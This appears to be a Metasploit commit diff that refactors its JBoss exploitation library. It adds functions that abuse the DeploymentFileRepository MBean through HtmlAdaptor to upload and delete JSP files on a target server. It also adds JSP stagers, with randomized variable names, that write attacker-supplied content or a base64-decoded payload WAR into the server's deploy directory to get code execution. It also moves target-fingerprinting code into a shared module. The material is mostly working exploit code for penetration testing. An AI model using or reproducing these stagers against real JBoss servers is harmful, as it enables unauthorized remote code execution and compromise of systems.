Land rapid7#3729, @us3r777's Jboss deploymentfilerepository refactoring

Author: jvazquez-r7

lib/msf/http/jboss.rb

@@ -5,13 +5,17 @@ module Msf
   module HTTP
     module JBoss
       require 'msf/http/jboss/base'
-      require 'msf/http/jboss/bean_shell_scripts'
       require 'msf/http/jboss/bean_shell'
+      require 'msf/http/jboss/bean_shell_scripts'
+      require 'msf/http/jboss/deployment_file_repository'
+      require 'msf/http/jboss/deployment_file_repository_scripts'
 
       include Msf::Exploit::Remote::HttpClient
       include Msf::HTTP::JBoss::Base
-      include Msf::HTTP::JBoss::BeanShellScripts
       include Msf::HTTP::JBoss::BeanShell
+      include Msf::HTTP::JBoss::BeanShellScripts
+      include Msf::HTTP::JBoss::DeploymentFileRepository
+      include Msf::HTTP::JBoss::DeploymentFileRepositoryScripts
 
       def initialize(info = {})     
         super

lib/msf/http/jboss/base.rb

@@ -5,7 +5,7 @@ module Msf::HTTP::JBoss::Base
   # Deploys a WAR through HTTP uri invoke
   #
   # @param opts [Hash] Hash containing {Exploit::Remote::HttpClient#send_request_cgi} options
-  # @param num_attempts [Integer] The number of attempts 
+  # @param num_attempts [Integer] The number of attempts
   # @return [Rex::Proto::Http::Response, nil] The {Rex::Proto::Http::Response} response if exists, nil otherwise
   def deploy(opts = {}, num_attempts = 5)
     uri = opts['uri']
@@ -46,4 +46,96 @@ def http_verb
     datastore['VERB']
   end
 
+
+  # Try to auto detect the target architecture and platform
+  #
+  # @param [Array] The available targets
+  # @return [Msf::Module::Target, nil] The detected target or nil
+  def auto_target(available_targets)
+    if http_verb == 'HEAD'
+      print_status("Sorry, automatic target detection doesn't work with HEAD requests")
+    else
+      print_status("Attempting to automatically select a target...")
+      res = query_serverinfo
+      plat = detect_platform(res)
+      unless plat
+        print_warning('Unable to detect platform!')
+        return nil
+      end
+
+      arch = detect_architecture(res)
+      unless arch
+        print_warning('Unable to detect architecture!')
+        return nil
+      end
+
+      # see if we have a match
+      available_targets.each { |t| return t if t['Platform'] == plat && t['Arch'] == arch }
+    end
+
+    # no matching target found, use Java as fallback
+    java_targets = available_targets.select {|t| t.name =~ /^Java/ }
+
+    java_targets[0]
+  end
+
+  # Query the server information from HtmlAdaptor
+  #
+  # @return [Rex::Proto::Http::Response, nil] The {Rex::Proto::Http::Response} response or nil
+  def query_serverinfo
+    path = normalize_uri(target_uri.path.to_s, 'HtmlAdaptor')
+    res = send_request_cgi(
+      {
+        'uri'    => path,
+        'method' => http_verb,
+        'vars_get' =>
+        {
+          'action' => 'inspectMBean',
+          'name' => 'jboss.system:type=ServerInfo'
+        }
+      })
+
+    unless res && res.code == 200
+      print_error("Failed: Error requesting #{path}")
+      return nil
+    end
+
+    res
+  end
+
+  # Try to autodetect the target platform
+  #
+  # @param res [Rex::Proto::Http::Response] the http response where fingerprint platform from
+  # @return [String, nil] The target platform or nil
+  def detect_platform(res)
+    if res && res.body =~ /<td.*?OSName.*?(Linux|FreeBSD|Windows).*?<\/td>/m
+      os = $1
+      if (os =~ /Linux/i)
+        return 'linux'
+      elsif (os =~ /FreeBSD/i)
+        return 'linux'
+      elsif (os =~ /Windows/i)
+        return 'win'
+      end
+    end
+
+    nil
+  end
+
+  # Try to autodetect the target architecture
+  #
+  # @param res [Rex::Proto::Http::Response] the http response where fingerprint architecture from
+  # @return [String, nil] The target architecture or nil
+  def detect_architecture(res)
+    if res && res.body =~ /<td.*?OSArch.*?(x86|i386|i686|x86_64|amd64).*?<\/td>/m
+      arch = $1
+      if arch =~ /(x86|i386|i686)/i
+        return ARCH_X86
+      elsif arch =~ /(x86_64|amd64)/i
+        return ARCH_X86
+      end
+    end
+
+    nil
+  end
 end

lib/msf/http/jboss/bean_shell_scripts.rb

@@ -1,7 +1,7 @@
 # -*- coding: binary -*-
 
 module Msf::HTTP::JBoss::BeanShellScripts
-  
+
   # Generates a Bean Shell Script.
   #
   # @param type [Symbol] The Bean Shell script type, `:create` or `:delete`.

lib/msf/http/jboss/deployment_file_repository.rb

@@ -0,0 +1,76 @@
+# -*- coding: binary -*-
+
+module Msf::HTTP::JBoss::DeploymentFileRepository
+
+  # Upload a text file with DeploymentFileRepository.store()
+  #
+  # @param base_name [String] The destination base name
+  # @param jsp_name [String] The destanation file name
+  # @param content [String] The content of the file
+  # @return [Rex::Proto::Http::Response, nil] The {Rex::Proto::Http::Response} response, nil if timeout
+  def upload_file(base_name, jsp_name, content)
+    params =  { }
+    params.compare_by_identity
+    params['action']     = 'invokeOpByName'
+    params['name']       = 'jboss.admin:service=DeploymentFileRepository'
+    params['methodName'] = 'store'
+    params['argType']    = 'java.lang.String'
+    params['arg0']       = base_name + '.war'
+    params['argType']    = 'java.lang.String'
+    params['arg1']       = jsp_name
+    params['argType']    = 'java.lang.String'
+    params['arg2']       = '.jsp'
+    params['argType']    = 'java.lang.String'
+    params['arg3']       = content
+    params['argType']    = 'boolean'
+    params['arg4']       = 'True'
+
+    opts = {
+      'method'	=> http_verb,
+      'uri'    => normalize_uri(target_uri.path.to_s, '/HtmlAdaptor')
+    }
+
+    if http_verb == 'POST'
+      opts.merge!('vars_post' => params)
+    else
+      opts.merge!('vars_get' => params)
+    end
+
+    send_request_cgi(opts)
+  end
+
+  # Delete a file with DeploymentFileRepository.remove().
+  #
+  # @param folder [String] The destination folder name
+  # @param name [String] The destination file name
+  # @param ext [String] The destination file extension
+  # @return [Rex::Proto::Http::Response, nil] The {Rex::Proto::Http::Response} response, nil if timeout
+  def delete_file(folder, name, ext)
+    params =  { }
+    params.compare_by_identity
+    params['action']     = 'invokeOpByName'
+    params['name']       = 'jboss.admin:service=DeploymentFileRepository'
+    params['methodName'] = 'remove'
+    params['argType']    = 'java.lang.String'
+    params['arg0']       = folder
+    params['argType']    = 'java.lang.String'
+    params['arg1']       = name
+    params['argType']    = 'java.lang.String'
+    params['arg2']       = ext
+
+    opts = {
+      'method'	=> http_verb,
+      'uri'    => normalize_uri(target_uri.path.to_s, '/HtmlAdaptor')
+    }
+
+    if http_verb == 'POST'
+      opts.merge!('vars_post' => params)
+      timeout = 5
+    else
+      opts.merge!('vars_get' => params)
+      timeout = 30
+    end
+    send_request_cgi(opts, timeout)
+  end
+
+end

lib/msf/http/jboss/deployment_file_repository_scripts.rb

@@ -0,0 +1,76 @@
+# -*- coding: binary -*-
+
+module Msf::HTTP::JBoss::DeploymentFileRepositoryScripts
+
+  # Generate a stager JSP to write the second stager to the
+  # deploy/management directory. It is only used with HEAD/GET requests
+  # to overcome the size limit in those requests
+  #
+  # @param stager_base [String] The name of the base of the stager.
+  # @param stager_jsp [String] The name name of the jsp stager.
+  # @return [String] The JSP head stager.
+  def head_stager_jsp(stager_base, stager_jsp_name)
+    content_var = Rex::Text.rand_text_alpha(8+rand(8))
+    file_path_var = Rex::Text.rand_text_alpha(8+rand(8))
+    jboss_home_var = Rex::Text.rand_text_alpha(8+rand(8))
+    fos_var = Rex::Text.rand_text_alpha(8+rand(8))
+    bw_var = Rex::Text.rand_text_alpha(8+rand(8))
+    head_stager_jsp_code = <<-EOT
+<%@page import="java.io.*,
+  java.util.*"
+%>
+<%
+  String #{jboss_home_var} = System.getProperty("jboss.server.home.dir");
+  String #{file_path_var} = #{jboss_home_var} + "/deploy/management/" + "#{stager_base}.war/" + "#{stager_jsp_name}" + ".jsp";
+  try {
+    String #{content_var} = "";
+    String parameterName = (String)(request.getParameterNames().nextElement());
+    #{content_var} = request.getParameter(parameterName);
+    FileWriter #{fos_var} = new FileWriter(#{file_path_var}, true);
+    BufferedWriter #{bw_var} = new BufferedWriter(#{fos_var});
+    #{bw_var}.write(#{content_var});
+    #{bw_var}.close();
+  }
+  catch(Exception e) { }
+%>
+    EOT
+    head_stager_jsp_code
+  end
+
+  # Generate a stager JSP to write a WAR file to the deploy/ directory.
+  # This is used to bypass the size limit for GET/HEAD requests.
+  #
+  # @param app_base [String] The name of the WAR app to write.
+  # @return [String] The JSP stager.
+  def stager_jsp_with_payload(app_base, encoded_payload)
+    decoded_var = Rex::Text.rand_text_alpha(8+rand(8))
+    file_path_var = Rex::Text.rand_text_alpha(8+rand(8))
+    jboss_home_var = Rex::Text.rand_text_alpha(8+rand(8))
+    fos_var = Rex::Text.rand_text_alpha(8+rand(8))
+    content_var = Rex::Text.rand_text_alpha(8+rand(8))
+
+    stager_jsp = <<-EOT
+<%@page import="java.io.*,
+    java.util.*,
+    sun.misc.BASE64Decoder"
+%>
+<%
+  String #{jboss_home_var} = System.getProperty("jboss.server.home.dir");
+  String #{file_path_var} = #{jboss_home_var} + "/deploy/management/" + "#{app_base}.war";
+  try {
+    String #{content_var} = "#{encoded_payload}";
+    FileOutputStream #{fos_var} = new FileOutputStream(#{file_path_var});
+    byte[] #{decoded_var} = new BASE64Decoder().decodeBuffer(#{content_var});
+    #{fos_var}.write(#{decoded_var});
+    #{fos_var}.close();
+  }
+  catch(Exception e){ }
+%>
+    EOT
+
+    stager_jsp
+  end
+
+
+
+end

modules/auxiliary/admin/http/jboss_bshdeployer.rb

@@ -126,8 +126,9 @@ def run
 
     case action.name
     when 'Deploy'
-      unless File.exist?(datastore['WARFILE'])
+      unless datastore['WARFILE'] && File.exist?(datastore['WARFILE'])
         print_error("WAR file not found")
+        return
       end
       war_data = File.read(datastore['WARFILE'])
       deploy_action(app_base, war_data)

modules/exploits/multi/http/jboss_bshdeployer.rb

@@ -96,7 +96,7 @@ def exploit
     mytarget = target
 
     if target.name =~ /Automatic/
-      mytarget = auto_target
+      mytarget = auto_target(targets)
       unless mytarget
         fail_with(Failure::NoTarget, "Unable to automatically select a target")
       end
@@ -195,73 +195,4 @@ def exploit
     handler
   end
 
-  def auto_target
-    if http_verb == 'HEAD' then
-      print_status("Sorry, automatic target detection doesn't work with HEAD requests")
-    else
-      print_status("Attempting to automatically select a target...")
-      res = query_serverinfo
-      if not (plat = detect_platform(res))
-        fail_with(Failure::NoTarget, 'Unable to detect platform!')
-      end
-
-      if not (arch = detect_architecture(res))
-        fail_with(Failure::NoTarget, 'Unable to detect architecture!')
-      end
-
-      # see if we have a match
-      targets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) }
-    end
-
-    # no matching target found, use Java as fallback
-    java_targets = targets.select {|t| t.name =~ /^Java/ }
-    return java_targets[0]
-  end
-
-  def query_serverinfo
-    path = normalize_uri(target_uri.path.to_s, '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo')
-    res = send_request_raw(
-      {
-        'uri'    => path,
-        'method' => http_verb
-      })
-
-    unless res && res.code == 200
-      print_error("Failed: Error requesting #{path}")
-      return nil
-    end
-
-    res
-  end
-
-  # Try to autodetect the target platform
-  def detect_platform(res)
-    if res && res.body =~ /<td.*?OSName.*?(Linux|FreeBSD|Windows).*?<\/td>/m
-      os = $1
-      if (os =~ /Linux/i)
-        return 'linux'
-      elsif (os =~ /FreeBSD/i)
-        return 'linux'
-      elsif (os =~ /Windows/i)
-        return 'win'
-      end
-    end
-
-    nil
-  end
-
-  # Try to autodetect the target architecture
-  def detect_architecture(res)
-    if res && res.body =~ /<td.*?OSArch.*?(x86|i386|i686|x86_64|amd64).*?<\/td>/m
-      arch = $1
-      if (arch =~ /(x86|i386|i686)/i)
-        return ARCH_X86
-      elsif (arch =~ /(x86_64|amd64)/i)
-        return ARCH_X86
-      end
-    end
-
-    nil
-  end
-
 end